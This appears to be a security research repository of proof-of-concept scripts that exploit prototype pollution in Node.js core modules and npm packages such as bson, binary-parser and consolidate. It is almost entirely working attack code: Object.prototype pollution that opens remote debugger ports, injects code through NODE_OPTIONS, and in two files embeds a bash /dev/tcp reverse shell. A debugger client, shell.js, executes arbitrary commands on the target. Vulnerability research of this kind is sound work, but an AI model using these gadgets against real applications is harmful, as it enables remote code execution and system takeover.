3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
4 |
5 | const spawnedProcess = execFile('node', [`${__dirname}/test.js`], {env: {AAA: "BBB"}});
6 |
7 | spawnedProcess.stdout.on('data', (data) => {
8 | console.log(`Output: ${data}`);
9 | });
10 |
11 | spawnedProcess.stderr.on('data', (data) => {
12 | console.error(`Error: ${data}`);
13 | });
14 |
15 | spawnedProcess.on('close', (code) => {
16 | console.log(`Process exited with code ${code}`);
17 | });
18 |
19 | spawnedProcess.on('error', (err) => {
20 | console.error(`Spawned process error: ${err}`);
21 | });
--------------------------------------------------------------------------------
/nodejs/child_process/execFileSync.env.PoC.js:
--------------------------------------------------------------------------------
1 |
2 | const { execFileSync } = require('child_process');
3 |
4 | Object.prototype.shell = "node";
5 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
6 |
7 | const output = execFileSync('hostname', { });
8 | console.log(output.toString());
9 |
--------------------------------------------------------------------------------
/nodejs/child_process/execFileSync.input.win.PoC.js:
--------------------------------------------------------------------------------
1 | // PARTIALLY FIXED
2 |
3 | const { execFileSync } = require('child_process');
4 |
5 | Object.prototype.shell = 'cmd.exe.';
6 | Object.prototype.input = 'echo PWNED\n';
7 |
8 | const output = execFileSync('hostname', { });
9 | console.log(output.toString());
10 |
--------------------------------------------------------------------------------
/nodejs/child_process/execSync.env.PoC.js:
--------------------------------------------------------------------------------
1 | // PARTIALLY FIXED
2 |
3 | const { spawn, spawnSync, exec, execSync } = require('child_process');
4 |
5 | // Object.prototype.shell = "node"; // doesn't work now
6 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
7 |
8 | const output = execSync('node -e "console.log(`NORMAL EXECUTION`)"', { env: {AAA: "BBB"} });
9 | console.log(output.toString());
10 |
--------------------------------------------------------------------------------
/nodejs/child_process/execSync.env.lnx.PoC.js:
--------------------------------------------------------------------------------
1 | // FIXED !!!
2 | // we can only add a new env var but not rewrite them
3 |
4 | // based on https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
5 | // run `nc -lnvp 4242`
6 | const { spawn, spawnSync, exec, execSync } = require('child_process');
7 |
8 | Object.prototype.shell = "node";
9 | Object.prototype.env = {};
10 | Object.prototype.env.AAAA = 'require("child_process").execSync("bash -i >& /dev/tcp/127.0.0.1/4242 0>&1", {shell: "/bin/bash"});process.exit()//';
11 | Object.prototype.env.NODE_OPTIONS = '--require /proc/self/environ';
12 |
13 | const output = execSync('ping -c 4 127.0.0.1');
14 | console.log(output.toString());
15 |
--------------------------------------------------------------------------------
/nodejs/child_process/execSync.input.win.PoC.js:
--------------------------------------------------------------------------------
1 | // FIXED !!!
2 |
3 | const { exec, execSync } = require('child_process');
4 |
5 | Object.prototype.shell = 'cmd.exe.';
6 | Object.prototype.input = 'echo PWNED\n';
7 |
8 | // execSync copies the options by secure way now
9 | const output = execSync('echo "NORMAL EXECUTION"');
10 | console.log(output.toString());
11 |
--------------------------------------------------------------------------------
/nodejs/child_process/fork.env.PoC.js:
--------------------------------------------------------------------------------
1 | const { fork } = require('child_process');
2 |
3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
4 |
5 | const child = fork(`${__dirname}/test.js`, { env: { AAA: "BBB" }});
6 |
7 | child.on('close', (code) => {
8 | console.log(`Child process exited with code ${code}`);
9 | });
10 |
--------------------------------------------------------------------------------
/nodejs/child_process/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "child-process-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "child-process-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "node-inspect": "^2.0.0"
13 | }
14 | },
15 | "node_modules/node-inspect": {
16 | "version": "2.0.0",
17 | "resolved": "https://registry.npmjs.org/node-inspect/-/node-inspect-2.0.0.tgz",
18 | "integrity": "sha512-vaDNU6Fa/vt8gv/PV+QoeSIPhcBnHMiNOtInxcojfagspQg5KP9HloUDGJWIacamT8Agiu51eF+fuBjrE25a6w==",
19 | "deprecated": "This module is part of Node.js core and does not need to be installed separately. It is now unmaintained.",
20 | "bin": {
21 | "node-inspect": "cli.js"
22 | }
23 | }
24 | },
25 | "dependencies": {
26 | "node-inspect": {
27 | "version": "2.0.0",
28 | "resolved": "https://registry.npmjs.org/node-inspect/-/node-inspect-2.0.0.tgz",
29 | "integrity": "sha512-vaDNU6Fa/vt8gv/PV+QoeSIPhcBnHMiNOtInxcojfagspQg5KP9HloUDGJWIacamT8Agiu51eF+fuBjrE25a6w=="
30 | }
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/nodejs/child_process/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "child-process-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "shell.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "node-inspect": "^2.0.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/nodejs/child_process/shell.js:
--------------------------------------------------------------------------------
1 | // see https://chromedevtools.github.io/devtools-protocol/tot/Debugger
2 | const InspectorClient = require('node-inspect/lib/internal/inspect_client.js');
3 | const readline = require('readline');
4 |
5 | const targetIP = '127.0.0.1';
6 | const targetPort = 1337;
7 |
8 | const rl = readline.createInterface({
9 | input: process.stdin,
10 | output: process.stdout
11 | });
12 |
13 | async function main() {
14 | try {
15 | const client = new InspectorClient();
16 | await client.connect(targetPort, targetIP);
17 |
18 | process.stdout.write("INIT\n");
19 | await client.callMethod("Debugger.enable");
20 | await client.callMethod("Runtime.enable");
21 |
22 | await client.addListener('Debugger.paused', async (p) =>{
23 | process.stdout.write("paused\n\n");
24 |
25 | rl.setPrompt('> ');
26 | rl.prompt();
27 |
28 | rl.on('line', async function(cmd) {
29 | let output = await client.callMethod("Runtime.evaluate", {
30 | expression: `require('child_process').execSync('${cmd.trim()}').toString()`,
31 | includeCommandLineAPI: true
32 | });
33 |
34 | console.log(output.result.value);
35 |
36 | rl.prompt();
37 | }).on('close', function() {
38 | console.log('Have a great day!');
39 | process.exit(0);
40 | });
41 |
42 | //await client.callMethod("Debugger.resume");
43 | });
44 |
45 | await client.addListener('Debugger.resumed', (p) =>{
46 | process.stdout.write("resumed\n");
47 | });
48 |
49 | await client.callMethod("Runtime.evaluate", {
50 | expression: "process.on('exit', (code) => {debugger;console.log('EVAL');})",
51 | includeCommandLineAPI: false
52 | });
53 |
54 | await client.callMethod("Runtime.runIfWaitingForDebugger");
55 | process.stdout.write("RUN\n");
56 | } catch (e) {
57 | console.error(e);
58 | process.exit(1);
59 | }
60 | }
61 |
62 | main();
63 |
--------------------------------------------------------------------------------
/nodejs/child_process/spawn.env.PoC.js:
--------------------------------------------------------------------------------
1 | const { spawn } = require('child_process');
2 |
3 | Object.prototype.shell = "node";
4 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
5 |
6 | const spawnedProcess = spawn('hostname', { });
7 |
8 | spawnedProcess.stdout.on('data', (data) => {
9 | console.log(`Output: ${data}`);
10 | });
11 |
12 | spawnedProcess.stderr.on('data', (data) => {
13 | console.error(`Error: ${data}`);
14 | });
15 |
16 | spawnedProcess.on('close', (code) => {
17 | console.log(`Process exited with code ${code}`);
18 | });
19 |
20 | spawnedProcess.on('error', (err) => {
21 | console.error(`Spawned process error: ${err}`);
22 | });
--------------------------------------------------------------------------------
/nodejs/child_process/spawn.input.win.js:
--------------------------------------------------------------------------------
1 | // FIXED !!
2 |
3 | const { spawn } = require('child_process');
4 |
5 | Object.prototype.shell = 'cmd.exe.';
6 | Object.prototype.input = 'echo PWNED\n';
7 |
8 | const spawnedProcess = spawn('hostname', {});
9 |
10 | spawnedProcess.stdout.on('data', (data) => {
11 | console.log(`Output: ${data}`);
12 | });
13 |
14 | spawnedProcess.stderr.on('data', (data) => {
15 | console.error(`Error: ${data}`);
16 | });
17 |
18 | spawnedProcess.on('close', (code) => {
19 | console.log(`Process exited with code ${code}`);
20 | });
21 |
22 | spawnedProcess.on('error', (err) => {
23 | console.error(`Spawned process error: ${err}`);
24 | });
--------------------------------------------------------------------------------
/nodejs/child_process/spawnSync.env.PoC.js:
--------------------------------------------------------------------------------
1 | // PARTIALLY FIXED
2 |
3 | const { spawn, spawnSync, exec, execSync, execFile, execFileSync } = require('child_process');
4 |
5 | Object.prototype.shell = "node";
6 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
7 |
8 | const cp = spawnSync('hostname', { });
9 | console.log(cp.output.toString());
10 |
11 |
--------------------------------------------------------------------------------
/nodejs/child_process/spawnSync.env.lnx.PoC.js:
--------------------------------------------------------------------------------
1 | // FIXED
2 |
3 | // based on https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
4 | // run `nc -lnvp 4242`
5 | const { spawn, spawnSync, exec, execSync, execFile, execFileSync } = require('child_process');
6 |
7 | Object.prototype.shell = "node";
8 | Object.prototype.env = {};
9 | Object.prototype.env.AAAA = 'require("child_process").execSync("bash -i >& /dev/tcp/127.0.0.1/4242 0>&1", {shell: "/bin/bash"});process.exit()//';
10 | Object.prototype.env.NODE_OPTIONS = '--require /proc/self/environ';
11 |
12 | const output = spawnSync('ping -c 4 127.0.0.1');
13 | console.log(output.toString());
14 |
--------------------------------------------------------------------------------
/nodejs/child_process/spawnSync.input.win.PoC.js:
--------------------------------------------------------------------------------
1 | // PARTIALLY FIXED
2 |
3 | const { spawnSync } = require('child_process');
4 |
5 | Object.prototype.shell = 'cmd.exe.';
6 | Object.prototype.input = 'echo PWNED\n';
7 |
8 | const cp = spawnSync('hostname', {});
9 | console.log(cp.output.toString());
10 |
--------------------------------------------------------------------------------
/nodejs/child_process/test.js:
--------------------------------------------------------------------------------
1 | console.log("NORMAL EXECUTION")
--------------------------------------------------------------------------------
/nodejs/http/fetch.options.PoC.js:
--------------------------------------------------------------------------------
1 | Object.prototype.referrer = 'http://google.com'; // DoS
2 | Object.prototype.method = "POST" // EoP
3 | Object.prototype.body = "AAA" // EoP
4 |
5 | fetch('http://localhost:3000')
--------------------------------------------------------------------------------
/nodejs/http/fetch.socketPath.PoC.js:
--------------------------------------------------------------------------------
1 | // listen the socket by `nc -lU /tmp/socket1`
2 |
3 | // By default, Docker runs through a non-networked UNIX socket.
4 | // try to use it to send GET requiest /containers/json
5 |
6 | Object.prototype.socketPath = '/tmp/socket1';
7 |
8 | async function main() {
9 | console.log(await fetch('http://example.com'))
10 | }
11 |
12 | main();
--------------------------------------------------------------------------------
/nodejs/http/get.options.PoC.js:
--------------------------------------------------------------------------------
1 | const http = require('http');
2 |
3 | // G1
4 | //Object.prototype.agent = "aaa" // DoS
5 |
6 | // G2
7 | Object.prototype.method = "POST";
8 | Object.prototype.port = 3000;
9 | Object.prototype.headers = {test: 123, host: 'fake'};
10 | Object.prototype.path = '/test-path'
11 | //Object.prototype.hostname = "example.com" // send requist to this address and ignore host
12 |
13 | http.get({
14 | host: 'localhost',
15 | //port: 3000,
16 | });
17 |
--------------------------------------------------------------------------------
/nodejs/http/listen.host.PoC.js:
--------------------------------------------------------------------------------
1 | const http = require('http');
2 |
3 | //Object.prototype.host = "example.com"; // DoS (via an exception) or sending DNS request
4 | Object.prototype.backlog = "fdsfsd"; // DoS by native uncached exception
5 |
6 | try {
7 | const server = http.createServer(() => {
8 | console.log("HEJ!")
9 | });
10 |
11 | server.listen(1234, () => {
12 | console.log("HELLO!")
13 | });
14 | } catch (e) {
15 | console.log(e)
16 | }
--------------------------------------------------------------------------------
/nodejs/http/requiest.options.PoC.js:
--------------------------------------------------------------------------------
1 | const http = require('http');
2 |
3 | Object.prototype.method = "POST";
4 | Object.prototype.port = 3000;
5 | Object.prototype.headers = {test: 123, host: 'fake'};
6 | Object.prototype.path = '/test'
7 | //Object.prototype.hostname = "example.com" // send requist to this address and ignore host
8 |
9 | const req = http.request({
10 | host: 'localhost',
11 | //port: 3000,
12 | });
13 |
14 | req.end();
15 |
--------------------------------------------------------------------------------
/nodejs/https/get.options.PoC.js:
--------------------------------------------------------------------------------
1 | const https = require('https');
2 |
3 | Object.prototype.method = "POST";
4 | // Object.prototype.port = 3000;
5 | Object.prototype.headers = {test: 123, host: 'fake'};
6 | Object.prototype.path = '/test';
7 | Object.prototype.NODE_TLS_REJECT_UNAUTHORIZED = '0';
8 | //Object.prototype.hostname = "example.com" // send requist to this address and ignore host
9 |
10 | //Object.prototype.session = 1 // DoS
11 | //Object.prototype.ALPNProtocols = ['http/1.0'] // DoS or changing protocol if the server supports it
12 |
13 | const options = {
14 | host: 'localhost',
15 | //rejectUnauthorized: false // to ignore self-signed certificate errors
16 | };
17 |
18 | const req = https.get(options, (res) => {
19 | console.log(`statusCode: ${res.statusCode}`);
20 |
21 | res.on('data', (d) => {
22 | process.stdout.write(d);
23 | });
24 | });
25 |
26 | req.on('error', (e) => {
27 | console.error(e);
28 | });
29 |
30 | req.end();
31 |
--------------------------------------------------------------------------------
/nodejs/https/requiest.options.PoC.js:
--------------------------------------------------------------------------------
1 | const https = require('https');
2 |
3 | Object.prototype.method = "POST";
4 | // Object.prototype.port = 3000;
5 | Object.prototype.headers = {test: 123, host: 'fake'};
6 | Object.prototype.path = '/test'
7 | //Object.prototype.hostname = "example.com" // send requist to this address and ignore host
8 |
9 | //Object.prototype.session = 1 // DoS
10 | //Object.prototype.ALPNProtocols = ['http/1.0'] // DoS or changing protocol if the server supports it
11 |
12 | const options = {
13 | host: 'localhost',
14 | rejectUnauthorized: false // to ignore self-signed certificate errors
15 | };
16 |
17 | const req = https.request(options, (res) => {
18 | console.log(`statusCode: ${res.statusCode}`);
19 |
20 | res.on('data', (d) => {
21 | process.stdout.write(d);
22 | });
23 | });
24 |
25 | req.on('error', (e) => {
26 | console.error(e);
27 | });
28 |
29 | req.end();
30 |
--------------------------------------------------------------------------------
/nodejs/https/tls.connect.PoC.js:
--------------------------------------------------------------------------------
1 | const tls = require('tls');
2 |
3 | //Object.prototype.session = 1 // DoS
4 | Object.prototype.port = 3000;
5 | Object.prototype.path = '/test';
6 | //Object.prototype.rejectUnauthorized = false;
7 |
8 | tls.connect({
9 | //port: 3000,
10 | //path: '/test',
11 | host: '127.0.0.1',
12 | //ALPNProtocols: ['h2'],
13 | }).on('error', (e) => console.log(e));
14 |
--------------------------------------------------------------------------------
/nodejs/import/import.source.PoC.js:
--------------------------------------------------------------------------------
1 |
2 | Object.prototype.source = 'console.log("PWNED")'
3 |
4 | import('./test.mjs')
--------------------------------------------------------------------------------
/nodejs/import/test.mjs:
--------------------------------------------------------------------------------
1 | console.log('NORMAL EXECUTION')
--------------------------------------------------------------------------------
/nodejs/require/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "require-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "require-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "bytes": "^3.1.2"
13 | }
14 | },
15 | "node_modules/bytes": {
16 | "version": "3.1.2",
17 | "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz",
18 | "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==",
19 | "engines": {
20 | "node": ">= 0.8"
21 | }
22 | }
23 | },
24 | "dependencies": {
25 | "bytes": {
26 | "version": "3.1.2",
27 | "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz",
28 | "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg=="
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/nodejs/require/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "require-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "bytes": "^3.1.2"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/nodejs/require/require.main.PoC.js:
--------------------------------------------------------------------------------
1 |
2 | Object.prototype.main = 'C:/PROGRA~1/nodejs/node_modules/corepack/dist/npm.js' // for Windows
3 | //Object.prototype.main = "/usr/lib/node_modules/corepack/dist/npm.js" // for Linux
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | require('bytes')
--------------------------------------------------------------------------------
/nodejs/require/require.main2.PoC.js:
--------------------------------------------------------------------------------
1 | // FIXED in v18.19.0 https://github.com/nodejs/node/commit/fe26f8a8609f7af04f9149f2c515f423e483018b
2 |
3 | Object.prototype.main = 'C:/PROGRA~1/nodejs/node_modules/corepack/dist/npm.js' // for Windows
4 | //Object.prototype.main = "/usr/lib/node_modules/corepack/dist/npm.js" // for Linux
5 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
6 |
7 | require('./test_sub_folder')
--------------------------------------------------------------------------------
/nodejs/require/test_sub_folder/index.js:
--------------------------------------------------------------------------------
1 | console.log("NORMAL EXECUTION")
--------------------------------------------------------------------------------
/nodejs/working_threads/ctor.PoC.js:
--------------------------------------------------------------------------------
1 | const { Worker } = require('worker_threads');
2 |
3 | //Object.prototype.eval = true; // DoS or second-order ACE if an attacker controls a part of file name
4 | //Object.prototype.env = { AAA: "attacker controlled" };
5 |
6 |
7 | new Worker(`${__dirname}/test.js`, { workerData: {}, execArgv: ['--inspect-brk', '0.0.0.0:1337'] })
--------------------------------------------------------------------------------
/nodejs/working_threads/test.js:
--------------------------------------------------------------------------------
1 |
2 | if (process.env.AAA)
3 | console.log("ENV VAR AAA: " + process.env.AAA)
4 | else
5 | console.log("NO ENV VAR AAA")
--------------------------------------------------------------------------------
/npm-packages/0-day.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KTH-LangSec/server-side-prototype-pollution/adf98a88baad39383fec8aa4a6d4ac28986b2a1b/npm-packages/0-day.zip
--------------------------------------------------------------------------------
/npm-packages/asyncawait/asyncawait.PoC.js:
--------------------------------------------------------------------------------
1 | Object.prototype.shell = "node";
2 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
3 |
4 | // TODO: exploitable only on Linux; the reverse shell does not work
5 |
6 | var async = require('asyncawait/async');
7 |
8 | // the rest part of the example is not required:
9 |
10 | // var await = require('asyncawait/await');
11 | // var Promise = require('bluebird');
12 | // var fs = Promise.promisifyAll(require('fs')); // adds Async() versions that return promises
13 | // var path = require('path');
14 | // var _ = require('lodash');
15 |
16 | // /** Returns the number of files in the given directory. */
17 | // var countFiles = async (function (dir) {
18 | // var files = await (fs.readdirAsync(dir));
19 | // var paths = _.map(files, function (file) { return path.join(dir, file); });
20 | // var stats = await (_.map(paths, function (path) { return fs.statAsync(path); })); // parallel!
21 | // return _.filter(stats, function (stat) { return stat.isFile(); }).length;
22 | // });
23 |
24 | // // Give it a spin
25 | // countFiles(__dirname)
26 | // .then (function (num) { console.log('There are ' + num + ' files in ' + __dirname); })
27 | // .catch(function (err) { console.log('Something went wrong: ' + err); });
--------------------------------------------------------------------------------
/npm-packages/asyncawait/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "asyncawait-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "asyncawait": "^3.0.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/better-queue/better-queue.PoC.js:
--------------------------------------------------------------------------------
1 | var Queue = require('better-queue');
2 |
3 | // see npm-packages\node_modules\better-queue-payload.js
4 | Object.prototype.store = 'payload'
5 |
6 | var q = new Queue(function (input, cb) {
7 | // Some processing here ...
8 | cb(null, result);
9 | })
10 |
11 | q.push(1)
12 | q.push({ x: 1 })
--------------------------------------------------------------------------------
/npm-packages/better-queue/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "better-queue-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "better-queue": "^3.8.12"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/binary-parser/binary-parser.PoC.js:
--------------------------------------------------------------------------------
1 | // Module import
2 | const Parser = require("binary-parser").Parser;
3 |
4 | const payload = `console.log("PWNED")`;
5 | Object.prototype.alias = `(){};${payload};'*/var a='/*';btoa`;
6 |
7 | // Build an IP packet header Parser
8 | const ipHeader = new Parser()
9 | .endianness("big")
10 | .bit4("version")
11 | .bit4("headerLength")
12 | .uint8("tos")
13 | .uint16("packetLength")
14 | .uint16("id")
15 | .bit3("offset")
16 | .bit13("fragOffset")
17 | .uint8("ttl")
18 | .uint8("protocol")
19 | .uint16("checksum")
20 | .array("src", {
21 | type: "uint8",
22 | length: 4
23 | })
24 | .array("dst", {
25 | type: "uint8",
26 | length: 4
27 | });
28 |
29 | // Prepare buffer to parse.
30 | const buf = Buffer.from("450002c5939900002c06ef98adc24f6c850186d1", "hex");
31 |
32 | // Parse buffer and show result
33 | console.log(ipHeader.parse(buf));
--------------------------------------------------------------------------------
/npm-packages/binary-parser/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "binary-parser-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 2,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "binary-parser-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "binary-parser": "^2.2.1"
13 | }
14 | },
15 | "node_modules/binary-parser": {
16 | "version": "2.2.1",
17 | "resolved": "https://registry.npmjs.org/binary-parser/-/binary-parser-2.2.1.tgz",
18 | "integrity": "sha512-5ATpz/uPDgq5GgEDxTB4ouXCde7q2lqAQlSdBRQVl/AJnxmQmhIfyxJx+0MGu//D5rHQifkfGbWWlaysG0o9NA==",
19 | "engines": {
20 | "node": ">=12"
21 | }
22 | }
23 | },
24 | "dependencies": {
25 | "binary-parser": {
26 | "version": "2.2.1",
27 | "resolved": "https://registry.npmjs.org/binary-parser/-/binary-parser-2.2.1.tgz",
28 | "integrity": "sha512-5ATpz/uPDgq5GgEDxTB4ouXCde7q2lqAQlSdBRQVl/AJnxmQmhIfyxJx+0MGu//D5rHQifkfGbWWlaysG0o9NA=="
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/npm-packages/binary-parser/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "binary-parser-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "binary-parser": "^2.2.1"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/bson/bson.PoC.js:
--------------------------------------------------------------------------------
1 | const BSON = require('bson');
2 |
3 | const payload = BSON.serialize(
4 | {
5 | func: {
6 | _bsontype: "Code",
7 | code: "console.log('PWNED')"
8 | }
9 | }
10 | );
11 |
12 | Object.prototype.evalFunctions = 1;
13 |
14 | const result = BSON.deserialize(payload);
15 | result.func();
--------------------------------------------------------------------------------
/npm-packages/bson/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "bson-gadgets",
3 | "version": "1.0.0",
4 | "lockfileVersion": 3,
5 | "requires": true,
6 | "packages": {
7 | "": {
8 | "name": "bson-gadgets",
9 | "version": "1.0.0",
10 | "license": "MIT",
11 | "dependencies": {
12 | "bson": "4.7.2"
13 | }
14 | },
15 | "node_modules/base64-js": {
16 | "version": "1.5.1",
17 | "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz",
18 | "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==",
19 | "funding": [
20 | {
21 | "type": "github",
22 | "url": "https://github.com/sponsors/feross"
23 | },
24 | {
25 | "type": "patreon",
26 | "url": "https://www.patreon.com/feross"
27 | },
28 | {
29 | "type": "consulting",
30 | "url": "https://feross.org/support"
31 | }
32 | ]
33 | },
34 | "node_modules/bson": {
35 | "version": "4.7.2",
36 | "resolved": "https://registry.npmjs.org/bson/-/bson-4.7.2.tgz",
37 | "integrity": "sha512-Ry9wCtIZ5kGqkJoi6aD8KjxFZEx78guTQDnpXWiNthsxzrxAK/i8E6pCHAIZTbaEFWcOCvbecMukfK7XUvyLpQ==",
38 | "dependencies": {
39 | "buffer": "^5.6.0"
40 | },
41 | "engines": {
42 | "node": ">=6.9.0"
43 | }
44 | },
45 | "node_modules/buffer": {
46 | "version": "5.7.1",
47 | "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz",
48 | "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==",
49 | "funding": [
50 | {
51 | "type": "github",
52 | "url": "https://github.com/sponsors/feross"
53 | },
54 | {
55 | "type": "patreon",
56 | "url": "https://www.patreon.com/feross"
57 | },
58 | {
59 | "type": "consulting",
60 | "url": "https://feross.org/support"
61 | }
62 | ],
63 | "dependencies": {
64 | "base64-js": "^1.3.1",
65 | "ieee754": "^1.1.13"
66 | }
67 | },
68 | "node_modules/ieee754": {
69 | "version": "1.2.1",
70 | "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz",
71 | "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==",
72 | "funding": [
73 | {
74 | "type": "github",
75 | "url": "https://github.com/sponsors/feross"
76 | },
77 | {
78 | "type": "patreon",
79 | "url": "https://www.patreon.com/feross"
80 | },
81 | {
82 | "type": "consulting",
83 | "url": "https://feross.org/support"
84 | }
85 | ]
86 | }
87 | }
88 | }
89 |
--------------------------------------------------------------------------------
/npm-packages/bson/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "bson-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "bson": "4.7.2"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/chrome-launcher/chrome-launcher.PoC.js:
--------------------------------------------------------------------------------
1 | const ChromeLauncher = require('chrome-launcher');
2 |
3 | Object.prototype.shell = 'node';
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | ChromeLauncher.launch({
7 | startingUrl: 'https://google.com'
8 | }).then(chrome => {
9 | console.log(`Chrome debugging port running on ${chrome.port}`);
10 | });
--------------------------------------------------------------------------------
/npm-packages/chrome-launcher/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "chrome-launcher-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "chrome-launcher": "^0.15.2"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/coffee/coffee.fork.PoC.js:
--------------------------------------------------------------------------------
1 | const coffee = require('coffee');
2 |
3 | if (process.argv[2] === 'child') {
4 | console.log(`Hello from ${process.argv[2]}!`);
5 | } else {
6 |
7 | // you can also control the options parameter for child_process.fork()
8 | // TODO: try to get reverse shell
9 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
10 |
11 | coffee.fork(__filename, ['child']).debug();
12 | }
--------------------------------------------------------------------------------
/npm-packages/coffee/coffee.spawn.PoC.js:
--------------------------------------------------------------------------------
1 | const coffee = require('coffee');
2 |
3 | // TODO: test a reverse shell for Linux
4 |
5 | Object.prototype.shell = 'node';
6 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
7 |
8 | coffee.spawn('cat')
9 | .write('1')
10 | .write('2')
11 | .expect('stdout', '12')
12 | .expect('code', 0)
13 | .end();
--------------------------------------------------------------------------------
/npm-packages/coffee/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "coffee-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "coffee": "^5.5.0"
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/colors.js:
--------------------------------------------------------------------------------
1 | console.log('PWNED')
--------------------------------------------------------------------------------
/npm-packages/consolidate/jazz.PoC.js:
--------------------------------------------------------------------------------
1 | var cons = require('consolidate');
2 |
3 | Object.prototype['views/page.html'] = 'console.log("PWNED")';
4 | Object.prototype.cache = true;
5 |
6 | cons.jazz('views/page.html', { user: 'tobi' })
7 | .then(function (html) {
8 | console.log(html);
9 | })
10 | .catch(function (err) {
11 | throw err;
12 | });
--------------------------------------------------------------------------------
/npm-packages/consolidate/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "consolidate-gadgets",
3 | "version": "1.0.0",
4 | "description": "",
5 | "main": "index.js",
6 | "author": "",
7 | "license": "MIT",
8 | "dependencies": {
9 | "consolidate": "0.16.0",
10 | "jazz": "^0.0.18",
11 | "underscore": "^1.13.6"
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/npm-packages/consolidate/underscore.PoC.js:
--------------------------------------------------------------------------------
1 | var cons = require('consolidate');
2 |
